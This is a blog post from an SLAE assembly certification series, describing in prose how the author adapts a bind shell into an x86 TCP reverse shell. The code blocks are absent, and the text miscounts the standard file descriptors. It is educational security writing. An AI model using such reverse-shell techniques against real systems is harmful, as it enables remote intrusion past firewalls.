And here we go again! This is post two of seven – describing my solutions for the SLAE course/certification (TCP Bind Shell in x86 Assembly language).
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-890
All right. This time we develop a TCP Reverse Shell in x86 Assembly language.
Template for the code had been the TCP Bind Shell from the previous blog post. I just had to do minor changes in order to change it to a reverse shell 😉
As usual you’ll find the source codes on my github page!
First of all, I had to find a smart (= easy to change later) way to store connection config parameters (ip and port) in the shellcode and decided to go a similar way as before – and just to extend it a bit.
So the last 6 bytes of the shellcode now carry the port (byte 1+2) and the ip address (bytes 3-6). It looks like this:
Next we create our socket (same as in bind shell):
We then map our three system fd’s STDIN (1), STDOUT (2) and STDERR (3) to the socket’s fd.
Looking good. Now the new stuff. We’ll use the socket function connect() to connect to the remote host. Please note the bit of code where we pull the config (ip and port) from the popped config struct (ebp!).
And finally.. Our old friend execve.
That’s it! After setting up a local listener with netcat and running the shellcode, we get a shell served remotely. Pretty handy when hacking a system that’s behind a NAT or Firewall 🙂
Thanks for reading! See you in the next assignment blog post.